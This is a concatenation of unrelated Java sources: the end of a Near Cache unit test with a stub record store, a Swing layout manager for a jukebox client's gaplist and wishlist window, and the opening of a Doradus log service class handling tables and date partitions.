config2.setInMemoryFormat(InMemoryFormat.BINARY);
NearCache nearCache1 = createNearCache(config1.getName(), config1, createManagedNearCacheRecordStore());
NearCache nearCache2 = createNearCache(config2.getName(), config2, createManagedNearCacheRecordStore());
// show that NearCache gets "inMemoryFormat" configuration from specified NearCacheConfig
assertEquals(InMemoryFormat.OBJECT, nearCache1.getInMemoryFormat());
assertEquals(InMemoryFormat.BINARY, nearCache2.getInMemoryFormat());
}
protected void doGetNearCacheStatsFromNearCache() {
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore();
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
// show that NearCache gets NearCacheStats from specified NearCacheRecordStore
assertEquals(managedNearCacheRecordStore.getNearCacheStats(), nearCache.getNearCacheStats());
}
protected void doSelectToSaveFromNearCache() {
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore();
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
Object selectedCandidate = nearCache.selectToSave();
// show that NearCache gets selected candidate from specified NearCacheRecordStore
assertTrue(managedNearCacheRecordStore.selectToSaveCalled);
assertEquals(managedNearCacheRecordStore.selectedCandidateToSave, selectedCandidate);
}
protected void doCreateNearCacheAndWaitForExpirationCalled(boolean useTTL) {
final ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore();
NearCacheConfig nearCacheConfig = createNearCacheConfig(DEFAULT_NEAR_CACHE_NAME, DEFAULT_MEMORY_FORMAT);
if (useTTL) {
nearCacheConfig.setTimeToLiveSeconds(DEFAULT_EXPIRATION_TASK_INITIAL_DELAY_IN_SECONDS - 1);
} else {
nearCacheConfig.setMaxIdleSeconds(DEFAULT_EXPIRATION_TASK_INITIAL_DELAY_IN_SECONDS - 1);
}
createNearCache(DEFAULT_NEAR_CACHE_NAME, nearCacheConfig, managedNearCacheRecordStore).initialize();
sleepSeconds(DEFAULT_EXPIRATION_TASK_INITIAL_DELAY_IN_SECONDS + 1);
// expiration will be called eventually
assertTrueEventually(new AssertTask() {
@Override
public void run() {
assertTrue(managedNearCacheRecordStore.doExpirationCalled);
}
});
}
protected void doPutToNearCacheStatsAndSeeEvictionCheckIsDone() {
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore();
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
nearCache.put(1, null, "1");
// show that NearCache checks eviction from specified NearCacheRecordStore
assertTrue(managedNearCacheRecordStore.doEvictionIfRequiredCalled);
}
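/**
 * Hand-rolled test double for {@link NearCacheRecordStore}: it records the latest
 * keys/values passed to get/put/remove and flags which lifecycle methods (clear,
 * destroy, selectToSave, doExpiration, doEvictionIfRequired) were invoked, so the
 * tests above can assert that the NearCache delegates each call to its record store.
 */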
protected class ManagedNearCacheRecordStore implements NearCacheRecordStore<Integer, String> {
protected final NearCacheStats nearCacheStats = new NearCacheStatsImpl();
protected final Object selectedCandidateToSave = new Object();
protected Map<Integer, String> expectedKeyValueMappings;
protected Integer latestKeyOnGet;
protected String latestValueOnGet;
protected Integer latestKeyOnPut;
protected String latestValueOnPut;
protected Integer latestKeyOnRemove;
protected int latestSize;
protected boolean latestResultOnRemove;
protected volatile boolean clearCalled;
protected volatile boolean destroyCalled;
protected volatile boolean selectToSaveCalled;
protected volatile boolean doEvictionIfRequiredCalled;
protected volatile boolean doExpirationCalled;
protected volatile StaleReadDetector staleReadDetector = StaleReadDetector.ALWAYS_FRESH;
protected ManagedNearCacheRecordStore(Map<Integer, String> expectedKeyValueMappings) {
this.expectedKeyValueMappings = expectedKeyValueMappings;
}
@Override
public void initialize() {
}
@Override
public String get(Integer key) {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
String value = expectedKeyValueMappings.get(key);
latestKeyOnGet = key;
latestValueOnGet = value;
return value;
}
@Override
public NearCacheRecord getRecord(Integer key) {
return null;
}
@Override
public void put(Integer key, Data keyData, String value) {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
expectedKeyValueMappings.put(key, value);
latestKeyOnPut = key;
latestValueOnPut = value;
}
@Override
public boolean remove(Integer key) {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
boolean result = expectedKeyValueMappings.remove(key) != null;
latestKeyOnRemove = key;
latestResultOnRemove = result;
return result;
}
@Override
public boolean invalidate(Integer key) {
return remove(key);
}
@Override
public void clear() {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
expectedKeyValueMappings.clear();
clearCalled = true;
}
@Override
public void destroy() {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
expectedKeyValueMappings.clear();
expectedKeyValueMappings = null;
destroyCalled = true;
}
@Override
public NearCacheStats getNearCacheStats() {
return nearCacheStats;
}
@Override
public Object selectToSave(Object... candidates) {
selectToSaveCalled = true;
return selectedCandidateToSave;
}
@Override
public int size() {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
latestSize = expectedKeyValueMappings.size();
return latestSize;
}
@Override
public void doExpiration() {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
doExpirationCalled = true;
}
@Override
public void doEvictionIfRequired() {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
doEvictionIfRequiredCalled = true;
}
@Override
public void doEviction() {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
}
@Override
public void storeKeys() {
}
@Override
public void loadKeys(DataStructureAdapter adapter) {
}
@Override
public void setStaleReadDetector(StaleReadDetector detector) {
staleReadDetector = detector;
}
@Override
public StaleReadDetector getStaleReadDetector() {
return staleReadDetector;
}
@Override
public long tryReserveForUpdate(Integer key, Data keyData) {
return NOT_RESERVED;
}
@Override
public String tryPublishReserved(Integer key, String value, long reservationId, boolean deserialize) {
return null;
}
}
}
|
|
package util.layouts;
import java.awt.Component;
import java.awt.Container;
import java.awt.Dimension;
import java.awt.LayoutManager;
import java.util.HashMap;
/**
* The {@link LayoutManager} for the Client.
* @author Haeldeus
* @version 1.0
*
*/
public class ClientLayout implements LayoutManager{
/**
* The String, that declares the Gaplist_Label, which displays {@code "Tracks in the
* Gaplist:"}.
*/
public static final String GAPLIST_LABEL = "Gaplist_Label";
/**
* The String, that declares the Wishlist_Label, which displays {@code "Tracks in the
* Wishlist:"}.
*/
public static final String WISHLIST_LABEL = "Wishlist_Label";
/**
* The String, that declares the Now_Playing_Label, which displays {@code "Now Playing:"}.
*/
public static final String NOW_PLAYING_LABEL = "Now_Playing_Label";
/**
* The String, that declares the Next_Track_Label, which displays {@code "Next Track:"}
*/
public static final String NEXT_TRACK_LABEL = "Next_Track_Label";
/**
* The String, that declares the Count_Gaplist_Label, which displays the current amount of
* Tracks in the Gaplist.
* @see windows.MainWindow#lblNoGaplist
*/
public static final String COUNT_GAPLIST_LABEL = "Count_Gaplist_Label";
/**
* The String, that declares the Count_Wishlist_Label, which displays the current amount of
* Tracks in the Wishlist.
* @see windows.MainWindow#lblNoWishlist
*/
public static final String COUNT_WISHLIST_LABEL = "Count_Wishlist_Label";
/**
* The String, that declares the Name_Now_Playing_Label, which displays the name of the
* current Track.
* @see windows.MainWindow#lblPlayingTrack
*/
public static final String NAME_NOW_PLAYING_LABEL = "Name_Now_Playing_Label";
/**
* The String, that declares the Name_Next_Track_Label, which displays the name of the
* next Track.
* @see windows.MainWindow#lblTrackNext
*/
public static final String NAME_NEXT_TRACK_LABEL = "Name_Next_Track_Label";
/**
* The String, that declares the Gaplist_Name_Label, which displays the Name of the current
* Gaplist.
* @see windows.MainWindow#lblGaplistName
*/
public static final String GAPLIST_NAME_LABEL = "Gaplist_Name_Label";
/**
* The String, that declares the Wishlist_Show_Label, which is the Header of the
* ScrollPane, that contains the Wishlist.
*/
public static final String WISHLIST_SHOW_LABEL = "Wishlist_Show_Label";
/**
* The String, that declares the Saved_Gaplist_Label, which is the Header of the
* ScrollPane, that contains all saved Gaplists on the Server.
*/
public static final String SAVED_GAPLIST_LABEL = "Saved_Gaplist_Label";
/**
* The String, that declares the Fail_Label, which will display responses from the Server.
*/
public static final String FAIL_LABEL = "Fail_Label";
/**
* The String, that declares the Add_Button.
*/
public static final String ADD_BUTTON = "Add_Button";
/**
* The String, that declares the Disconnect_Button.
*/
public static final String DISCONNECT_BUTTON = "Disconnect_Button";
/**
* The String, that declares the Debug_Button.
*/
public static final String DEBUG_BUTTON = "Debug_Button";
/**
* The String, that declares the Seek_Back_Button.
*/
public static final String SEEK_BACK_BUTTON = "Seek_Back_Button";
/**
* The String, that declares the Play_Pause_Button.
* @see windows.MainWindow#btnPlayPause
*/
public static final String PLAY_PAUSE_BUTTON = "Play_Pause_Button";
/**
* The String, that declares the Seek_Forward_Button.
*/
public static final String SEEK_FORWARD_BUTTON = "Seek_Forward_Button";
/**
* The String, that declares the Skip_Button.
*/
public static final String SKIP_BUTTON = "Skip_Button";
/**
* The String, that declares the Track_Up_Button.
*/
public static final String TRACK_UP_BUTTON = "Track_Up_Button";
/**
* The String, that declares the Track_Down_Button.
*/
public static final String TRACK_DOWN_BUTTON = "Track_Down_Button";
/**
* The String, that declares the Delete_Button.
*/
public static final String DELETE_BUTTON = "Delete_Button";
/**
* The String, that declares the Save_Button.
*/
public static final String SAVE_BUTTON = "Save_Button";
/**
* The String, that declares the Vote_Button.
*/
public static final String VOTE_BUTTON = "Vote_Button";
/**
* The String, that declares the Remove_Vote_Button.
*/
public static final String REMOVE_VOTE_BUTTON = "Remove_Vote_Button";
/**
* The String, that declares the Load_Button.
*/
public static final String LOAD_BUTTON = "Load_Button";
/**
* The String, that declares the Show_Button.
*/
public static final String SHOW_BUTTON = "Show_Button";
/**
* The String, that declares the Remove_Button.
*/
public static final String REMOVE_BUTTON = "Remove_Button";
/**
* The String, that declares the Create_Button.
*/
public static final String CREATE_BUTTON = "Create_Button";
/**
* The String, that declares the Link_Textfield, which will be used to add Videos to the
* Jukebox.
* @see windows.MainWindow#txtLink
*/
public static final String LINK_TEXT = "Link_Text";
/**
* The String, that declares the Gaplist_Textfield, which will be used to name new
* Gaplists.
*/
public static final String GAPLIST_TEXT = "Gaplist_Text";
/**
* The String, that declares the Gaplist_RadioButton.
*/
public static final String GAPLIST_RADIO = "Gaplist_Radio";
/**
* The String, that declares the Wishlist_RadioButton.
*/
public static final String WISHLIST_RADIO = "Wishlist_Radio";
/**
* The String, that declares the Front_CheckBox.
*/
public static final String FRONT_CHECK = "Front_Check";
/**
* The String, that declares the ScrollPane for the current Gaplist.
*/
public static final String GAPLIST_SCROLL = "Gaplist_Scroll";
/**
* The String, that declares the ScrollPane for the current Wishlist.
*/
public static final String WISHLIST_SCROLL = "Wishlist_Scroll";
/**
* The String, that declares the ScrollPane for all saved Gaplists on the Server.
*/
public static final String SAVED_GAPLIST_SCROLL = "Saved_Gaplist_Scroll";
/**
* The String, that declares the ScrollPane for the Content of the current shown Gaplist.
*/
public static final String CONTENT_SCROLL = "Content_Scroll";
/**
* A {@link HashMap} of all Components, that were added to the Layout.
* @see Component
*/
private HashMap<String, Component> components;
/**
* The Constructor for the Layout.
* @since 1.0
*/
public ClientLayout() {
components = new HashMap<String, Component>();
}
@Override
public void addLayoutComponent(String componentPosition, Component component) {
	if (checkLayoutComponent(componentPosition))
		components.put(componentPosition, component);
}
@Override
public void layoutContainer(Container parent) {
final int height = parent.getHeight();
final int width = parent.getWidth();
final int lblHeight = (int)(height*0.02);
final int spacer = (int)(width*0.016);
final int manButtonHeight = (int)(height*0.064);
final int manButtonWidth = (int)(width*0.2);
final int buttonHeight = (int)(height*0.032);
final int secondButtonY = (int)(height*0.624);
final int thirdButtonY = (int)(height*0.91);
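		// All bounds below are computed as fractions of the parent's current width/height
		// (with Math.min caps on some labels/buttons), so the layout scales when the window is resized.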
/***********************************Labels***************************************/
if (components.get(GAPLIST_LABEL) != null)
components.get(GAPLIST_LABEL).setBounds(10, 10, Math.min((int)(width*0.205),123), lblHeight);
if(components.get(WISHLIST_LABEL) != null)
components.get(WISHLIST_LABEL).setBounds(10, 10+ (int)(height*0.037), Math.min((int)(width*0.205), 123), lblHeight);
if (components.get(COUNT_GAPLIST_LABEL) != null)
components.get(COUNT_GAPLIST_LABEL).setBounds(10+Math.min((int)(width*0.205),123)+spacer, 10, (int)(width*0.1133), lblHeight);
if (components.get(COUNT_WISHLIST_LABEL) != null)
components.get(COUNT_WISHLIST_LABEL).setBounds(10+Math.min((int)(width*0.205),123)+spacer,10+(int)(height*0.037),(int)(width*0.1133),lblHeight);
if (components.get(NOW_PLAYING_LABEL) != null)
components.get(NOW_PLAYING_LABEL).setBounds(10, (int)(height*0.205), Math.min(68,(int)(width*0.1133)),lblHeight);
if (components.get(NEXT_TRACK_LABEL) != null)
components.get(NEXT_TRACK_LABEL).setBounds(10, (int)(height*0.241), Math.min(68,(int)(width*0.1133)),lblHeight);
if (components.get(NAME_NOW_PLAYING_LABEL) != null)
components.get(NAME_NOW_PLAYING_LABEL).setBounds(Math.min(68,(int)(width*0.1133)) + 10 + spacer, (int)(height*0.205), (int)(width*0.6406), lblHeight);
if (components.get(NAME_NEXT_TRACK_LABEL) != null)
components.get(NAME_NEXT_TRACK_LABEL).setBounds(Math.min(68,(int)(width*0.1133)) + 10 + spacer, (int)(height*0.241), (int)(width*0.6406), lblHeight);
if (components.get(GAPLIST_NAME_LABEL) != null)
components.get(GAPLIST_NAME_LABEL).setBounds(10, (int)(height*0.428), (int)(width*0.416), lblHeight);
if (components.get(WISHLIST_SHOW_LABEL) != null)
components.get(WISHLIST_SHOW_LABEL).setBounds((int)(width*0.533), (int)(height*0.428), (int)(width*0.416), lblHeight);
if (components.get(SAVED_GAPLIST_LABEL) != null)
components.get(SAVED_GAPLIST_LABEL).setBounds(10, (int)(height*0.714), (int)(width*0.416), lblHeight);
if (components.get(FAIL_LABEL) != null)
components.get(FAIL_LABEL).setBounds((int)(width*0.29), (int)(height*0.4), (int)(width*19.0/60.0), lblHeight);
/**************************Buttons**************************/
if (components.get(ADD_BUTTON) != null)
components.get(ADD_BUTTON).setBounds(10, (int)(height*0.13), (int)(width*0.1), (int)(height*0.04));
if (components.get(SEEK_BACK_BUTTON) != null)
components.get(SEEK_BACK_BUTTON).setBounds(10, (int)(height*0.277), manButtonWidth, manButtonHeight);
if (components.get(PLAY_PAUSE_BUTTON) != null)
components.get(PLAY_PAUSE_BUTTON).setBounds(manButtonWidth+10+spacer, (int)(height*0.277), manButtonWidth, manButtonHeight);
if (components.get(SEEK_FORWARD_BUTTON) != null)
components.get(SEEK_FORWARD_BUTTON).setBounds((int)(width*0.533), (int)(height*0.277), manButtonWidth, manButtonHeight);
if (components.get(SKIP_BUTTON) != null)
components.get(SKIP_BUTTON).setBounds((int)(width*0.533)+manButtonWidth+spacer, (int)(height*0.277), manButtonWidth, manButtonHeight);
if (components.get(DISCONNECT_BUTTON) != null)
components.get(DISCONNECT_BUTTON).setBounds((int)(width*0.533)+manButtonWidth+spacer, 10, manButtonWidth, buttonHeight);
if (components.get(DEBUG_BUTTON) != null)
components.get(DEBUG_BUTTON).setBounds((int)(width*0.533)+manButtonWidth+spacer, 10+(int)(height*0.032+height*0.01), manButtonWidth, buttonHeight);
if (components.get(DELETE_BUTTON) != null)
components.get(DELETE_BUTTON).setBounds(10, secondButtonY, manButtonWidth, buttonHeight);
if (components.get(SAVE_BUTTON) != null)
components.get(SAVE_BUTTON).setBounds(10+manButtonWidth+spacer, secondButtonY, manButtonWidth, buttonHeight);
if (components.get(TRACK_UP_BUTTON) != null)
components.get(TRACK_UP_BUTTON).setBounds(10+2*manButtonWidth+spacer+2, (int)(height*0.487), Math.min(40, (int)(width*0.067)), Math.min(25,(int)(height*0.036)));
if (components.get(TRACK_DOWN_BUTTON) != null)
components.get(TRACK_DOWN_BUTTON).setBounds(10+2*manButtonWidth+spacer+2, (int)(height*0.56), Math.min(40, (int)(width*0.067)), Math.min(25,(int)(height*0.036)));
if (components.get(LOAD_BUTTON) != null)
components.get(LOAD_BUTTON).setBounds(10, thirdButtonY, (int)((2*manButtonWidth+spacer)*0.3), buttonHeight);
if (components.get(SHOW_BUTTON) != null)
components.get(SHOW_BUTTON).setBounds(10+(int)((2*manButtonWidth+spacer)*0.3)+spacer, thirdButtonY, (int)((2*manButtonWidth+spacer)*0.3), buttonHeight);
if (components.get(REMOVE_BUTTON) != null)
components.get(REMOVE_BUTTON).setBounds(2*(int)((2*manButtonWidth+spacer)*0.3)+10+2*spacer, thirdButtonY, (int)((2*manButtonWidth+spacer+10)-(2*(int)((2*manButtonWidth+spacer)*0.3)+10+2*spacer)), buttonHeight);
if (components.get(CREATE_BUTTON) != null)
components.get(CREATE_BUTTON).setBounds((int)(width*0.533), thirdButtonY, (int)(width*2/15), buttonHeight);
if (components.get(VOTE_BUTTON) != null)
components.get(VOTE_BUTTON).setBounds((int)(width*0.533), secondButtonY, manButtonWidth, buttonHeight);
if (components.get(REMOVE_VOTE_BUTTON) != null)
components.get(REMOVE_VOTE_BUTTON).setBounds((int)(width*0.533)+manButtonWidth+spacer, secondButtonY, manButtonWidth, buttonHeight);
/************************************Panes**********************************/
if (components.get(GAPLIST_SCROLL) != null)
components.get(GAPLIST_SCROLL).setBounds(10, (int)(height*0.468), 2*manButtonWidth+spacer, height/7);
if (components.get(WISHLIST_SCROLL) != null)
components.get(WISHLIST_SCROLL).setBounds((int)(width*0.533), (int)(height*0.468), 2*manButtonWidth+spacer, height/7);
if (components.get(SAVED_GAPLIST_SCROLL) != null)
components.get(SAVED_GAPLIST_SCROLL).setBounds(10, (int)(height*0.754), 2*manButtonWidth+spacer, height/7);
if (components.get(CONTENT_SCROLL) != null)
components.get(CONTENT_SCROLL).setBounds((int)(width*0.533), (int)(height*0.753), 2*manButtonWidth+spacer, height/7);
/******************************TextFields********************************/
if (components.get(LINK_TEXT) != null)
components.get(LINK_TEXT).setBounds(10, (int)(height*3/35), (int)(width*0.533)-10, (int)(height/35));
if (components.get(GAPLIST_TEXT) != null)
components.get(GAPLIST_TEXT).setBounds((int)(width*0.533)+(int)(width*2/15)+spacer, thirdButtonY, (2*manButtonWidth)-((int)(width*2/15)), buttonHeight);
/*****************************RadioButtons********************************/
if (components.get(WISHLIST_RADIO) != null)
components.get(WISHLIST_RADIO).setBounds((int)(width*13/100), (int)(height*9/70), (int)(width*0.125), buttonHeight);
if (components.get(GAPLIST_RADIO) != null)
components.get(GAPLIST_RADIO).setBounds((int)(width*13/100)+(int)(width*0.125)+2, (int)(height*9/70), (int)(width*0.125), buttonHeight);
/***************************CheckBox***********************************/
if (components.get(FRONT_CHECK) != null)
components.get(FRONT_CHECK).setBounds((int)(width*13/100)+(int)(width*0.25)+4, (int)(height*9/70), (int)(width*97/600), buttonHeight);
}
@Override
public Dimension minimumLayoutSize(Container arg0) {
return new Dimension(300,300);
}
@Override
public Dimension preferredLayoutSize(Container arg0) {
return new Dimension(600,700);
}
@Override
public void removeLayoutComponent(Component comp) {
if (components.containsValue(comp))
remove(comp);
}
/**
 * Checks if the given String is the key for a Component in the components-HashMap.
 * @param regex The String that will be checked to see if it's a key in the HashMap.
 * @return true, if the String is a key, false otherwise.
* @since 1.0
* @see ClientLayout#components
*/
private boolean checkLayoutComponent(String regex) {
if ( regex.equals(GAPLIST_LABEL) || regex.equals(WISHLIST_LABEL) ||
regex.equals(NOW_PLAYING_LABEL) || regex.equals(NEXT_TRACK_LABEL) ||
regex.equals(COUNT_GAPLIST_LABEL) || regex.equals(COUNT_WISHLIST_LABEL) ||
regex.equals(NAME_NOW_PLAYING_LABEL) || regex.equals(NAME_NEXT_TRACK_LABEL) ||
regex.equals(GAPLIST_NAME_LABEL) || regex.equals(WISHLIST_SHOW_LABEL) ||
regex.equals(SAVED_GAPLIST_LABEL) || regex.equals(FAIL_LABEL) ||
regex.equals(ADD_BUTTON) || regex.equals(DISCONNECT_BUTTON) ||
regex.equals(DEBUG_BUTTON) || regex.equals(SEEK_BACK_BUTTON) ||
regex.equals(PLAY_PAUSE_BUTTON) || regex.equals(SEEK_FORWARD_BUTTON) ||
regex.equals(SKIP_BUTTON) || regex.equals(TRACK_UP_BUTTON) ||
regex.equals(TRACK_DOWN_BUTTON) || regex.equals(DELETE_BUTTON) ||
regex.equals(SAVE_BUTTON) || regex.equals(VOTE_BUTTON) ||
regex.equals(REMOVE_VOTE_BUTTON) || regex.equals(LOAD_BUTTON) ||
regex.equals(SHOW_BUTTON) || regex.equals(REMOVE_BUTTON) ||
regex.equals(CREATE_BUTTON) || regex.equals(LINK_TEXT) ||
regex.equals(GAPLIST_TEXT) || regex.equals(GAPLIST_RADIO) ||
regex.equals(WISHLIST_RADIO) || regex.equals(FRONT_CHECK) ||
regex.equals(GAPLIST_SCROLL) || regex.equals(WISHLIST_SCROLL) ||
regex.equals(SAVED_GAPLIST_SCROLL) || regex.equals(CONTENT_SCROLL))
return true;
else
return false;
}
/**
* Removes a Component from the Layout and replaces it with {@code null}.
* @param comp The Component to be removed.
* @since 1.0
* @see Component
*/
private void remove(Component comp) {
if (components.get(GAPLIST_LABEL) != null)
if (components.get(GAPLIST_LABEL).equals(comp)) {
components.put(GAPLIST_LABEL, null);
return;
}
if (components.get(WISHLIST_LABEL) != null)
if (components.get(WISHLIST_LABEL).equals(comp)) {
components.put(WISHLIST_LABEL, null);
return;
}
if (components.get(NOW_PLAYING_LABEL) != null)
if (components.get(NOW_PLAYING_LABEL).equals(comp)) {
components.put(NOW_PLAYING_LABEL, null);
return;
}
if (components.get(NEXT_TRACK_LABEL) != null)
if (components.get(NEXT_TRACK_LABEL).equals(comp)) {
components.put(NEXT_TRACK_LABEL, null);
return;
}
if (components.get(COUNT_GAPLIST_LABEL) != null)
if (components.get(COUNT_GAPLIST_LABEL).equals(comp)) {
components.put(COUNT_GAPLIST_LABEL, null);
return;
}
if (components.get(COUNT_WISHLIST_LABEL) != null)
if (components.get(COUNT_WISHLIST_LABEL).equals(comp)) {
components.put(COUNT_WISHLIST_LABEL, null);
return;
}
if (components.get(NAME_NOW_PLAYING_LABEL) != null)
if (components.get(NAME_NOW_PLAYING_LABEL).equals(comp)) {
components.put(NAME_NOW_PLAYING_LABEL, null);
return;
}
if (components.get(NAME_NEXT_TRACK_LABEL) != null)
if (components.get(NAME_NEXT_TRACK_LABEL).equals(comp)) {
				components.put(NAME_NEXT_TRACK_LABEL, null);
return;
}
if (components.get(GAPLIST_NAME_LABEL) != null)
if (components.get(GAPLIST_NAME_LABEL).equals(comp)) {
components.put(GAPLIST_NAME_LABEL, null);
return;
}
if (components.get(WISHLIST_SHOW_LABEL) != null)
if (components.get(WISHLIST_SHOW_LABEL).equals(comp)) {
components.put(WISHLIST_SHOW_LABEL, null);
return;
}
if (components.get(SAVED_GAPLIST_LABEL) != null)
if (components.get(SAVED_GAPLIST_LABEL).equals(comp)) {
components.put(SAVED_GAPLIST_LABEL, null);
return;
}
if (components.get(FAIL_LABEL) != null)
if (components.get(FAIL_LABEL).equals(comp)) {
components.put(FAIL_LABEL, null);
return;
}
if (components.get(ADD_BUTTON) != null)
if (components.get(ADD_BUTTON).equals(comp)) {
components.put(ADD_BUTTON, null);
return;
}
if (components.get(DISCONNECT_BUTTON) != null)
if (components.get(DISCONNECT_BUTTON).equals(comp)) {
components.put(DISCONNECT_BUTTON, null);
return;
}
if (components.get(DEBUG_BUTTON) != null)
if (components.get(DEBUG_BUTTON).equals(comp)) {
components.put(DEBUG_BUTTON, null);
return;
}
if (components.get(SEEK_BACK_BUTTON) != null)
if (components.get(SEEK_BACK_BUTTON).equals(comp)) {
components.put(SEEK_BACK_BUTTON, null);
return;
}
if (components.get(PLAY_PAUSE_BUTTON) != null)
if (components.get(PLAY_PAUSE_BUTTON).equals(comp)) {
components.put(PLAY_PAUSE_BUTTON, null);
return;
}
if (components.get(SEEK_FORWARD_BUTTON) != null)
if (components.get(SEEK_FORWARD_BUTTON).equals(comp)) {
components.put(SEEK_FORWARD_BUTTON, null);
return;
}
if (components.get(SKIP_BUTTON) != null)
if (components.get(SKIP_BUTTON).equals(comp)) {
components.put(SKIP_BUTTON, null);
return;
}
if (components.get(TRACK_UP_BUTTON) != null)
if (components.get(TRACK_UP_BUTTON).equals(comp)) {
components.put(TRACK_UP_BUTTON, null);
return;
}
if (components.get(TRACK_DOWN_BUTTON) != null)
if (components.get(TRACK_DOWN_BUTTON).equals(comp)) {
components.put(TRACK_DOWN_BUTTON, null);
return;
}
if (components.get(DELETE_BUTTON) != null)
if (components.get(DELETE_BUTTON).equals(comp)) {
components.put(DELETE_BUTTON, null);
return;
}
if (components.get(SAVE_BUTTON) != null)
if (components.get(SAVE_BUTTON).equals(comp)) {
components.put(SAVE_BUTTON, null);
return;
}
if (components.get(VOTE_BUTTON) != null)
if (components.get(VOTE_BUTTON).equals(comp)) {
components.put(VOTE_BUTTON, null);
return;
}
if (components.get(REMOVE_VOTE_BUTTON) != null)
if (components.get(REMOVE_VOTE_BUTTON).equals(comp)) {
components.put(REMOVE_VOTE_BUTTON, null);
return;
}
if (components.get(LOAD_BUTTON) != null)
if (components.get(LOAD_BUTTON).equals(comp)) {
components.put(LOAD_BUTTON, null);
return;
}
if (components.get(SHOW_BUTTON) != null)
if (components.get(SHOW_BUTTON).equals(comp)) {
components.put(SHOW_BUTTON, null);
return;
}
if (components.get(REMOVE_BUTTON) != null)
if (components.get(REMOVE_BUTTON).equals(comp)) {
components.put(REMOVE_BUTTON, null);
return;
}
if (components.get(CREATE_BUTTON) != null)
if (components.get(CREATE_BUTTON).equals(comp)) {
components.put(CREATE_BUTTON, null);
return;
}
if (components.get(LINK_TEXT) != null)
if (components.get(LINK_TEXT).equals(comp)) {
components.put(LINK_TEXT, null);
return;
}
if (components.get(GAPLIST_TEXT) != null)
if (components.get(GAPLIST_TEXT).equals(comp)) {
components.put(GAPLIST_TEXT, null);
return;
}
if (components.get(GAPLIST_RADIO) != null)
if (components.get(GAPLIST_RADIO).equals(comp)) {
components.put(GAPLIST_RADIO, null);
return;
}
if (components.get(WISHLIST_RADIO) != null)
if (components.get(WISHLIST_RADIO).equals(comp)) {
components.put(WISHLIST_RADIO, null);
return;
}
if (components.get(FRONT_CHECK) != null)
if (components.get(FRONT_CHECK).equals(comp)) {
components.put(FRONT_CHECK, null);
return;
}
if (components.get(GAPLIST_SCROLL) != null)
if (components.get(GAPLIST_SCROLL).equals(comp)) {
components.put(GAPLIST_SCROLL, null);
return;
}
if (components.get(WISHLIST_SCROLL) != null)
if (components.get(WISHLIST_SCROLL).equals(comp)) {
components.put(WISHLIST_SCROLL, null);
return;
}
if (components.get(SAVED_GAPLIST_SCROLL) != null)
if (components.get(SAVED_GAPLIST_SCROLL).equals(comp)) {
components.put(SAVED_GAPLIST_SCROLL, null);
return;
}
if (components.get(CONTENT_SCROLL) != null)
if (components.get(CONTENT_SCROLL).equals(comp)) {
components.put(CONTENT_SCROLL, null);
return;
}
}
}
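/*
 * A minimal usage sketch (not part of the original client): it assumes a Swing container
 * simply installs ClientLayout and adds components with the layout's string keys as
 * constraints, which routes them through addLayoutComponent. Class, label and button
 * names here are illustrative only.
 */
class ClientLayoutUsageSketch {
	public static void main(String[] args) {
		javax.swing.SwingUtilities.invokeLater(new Runnable() {
			public void run() {
				javax.swing.JFrame frame = new javax.swing.JFrame("ClientLayout sketch");
				javax.swing.JPanel panel = new javax.swing.JPanel(new ClientLayout());
				// The constraint string decides where layoutContainer() places the component.
				panel.add(new javax.swing.JLabel("Tracks in the Gaplist:"), ClientLayout.GAPLIST_LABEL);
				panel.add(new javax.swing.JLabel("Tracks in the Wishlist:"), ClientLayout.WISHLIST_LABEL);
				panel.add(new javax.swing.JButton("Add"), ClientLayout.ADD_BUTTON);
				frame.setContentPane(panel);
				frame.setSize(600, 700);
				frame.setDefaultCloseOperation(javax.swing.JFrame.EXIT_ON_CLOSE);
				frame.setVisible(true);
			}
		});
	}
}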
|
|
package com.dell.doradus.logservice;
import java.util.ArrayList;
import java.util.List;
import com.dell.doradus.common.Utils;
import com.dell.doradus.logservice.search.Searcher;
import com.dell.doradus.logservice.store.BatchWriter;
import com.dell.doradus.logservice.store.ChunkMerger;
import com.dell.doradus.olap.OlapBatch;
import com.dell.doradus.olap.aggregate.AggregationResult;
import com.dell.doradus.olap.io.BSTR;
import com.dell.doradus.search.SearchResultList;
import com.dell.doradus.service.db.DBService;
import com.dell.doradus.service.db.DBTransaction;
import com.dell.doradus.service.db.DColumn;
import com.dell.doradus.service.db.DRow;
import com.dell.doradus.service.db.Tenant;
public class LogService {
public LogService() { }
public void createTable(Tenant tenant, String application, String table) {
String store = application + "_" + table;
DBService.instance(tenant).createStoreIfAbsent(store, true);
}
public void deleteTable(Tenant tenant, String application, String table) {
String store = application + "_" + table;
DBService.instance(tenant).deleteStoreIfPresent(store);
}
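    // Partitions are keyed by day: the timestamp is formatted as a date and reduced to "yyyyMMdd".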
public String getPartition(long timestamp) {
String date = new DateFormatter().format(timestamp);
String partition = date.substring(0, 10).replace("-", "");
return partition;
}
public long getTimestamp(String partition) {
String date = partition.substring(0, 4) + "-" + partition.substring(4, 6) + "-" + partition.substring(6, 8);
long timestamp = Utils.parseDate(date).getTimeInMillis();
return timestamp;
}
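    // Splits the batch into chunks of consecutive records that share the same day (taken from
    // each record's id/timestamp), writes each chunk as one column under its day partition, and
    // registers the partition, chunk metadata and field names in the same transaction.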
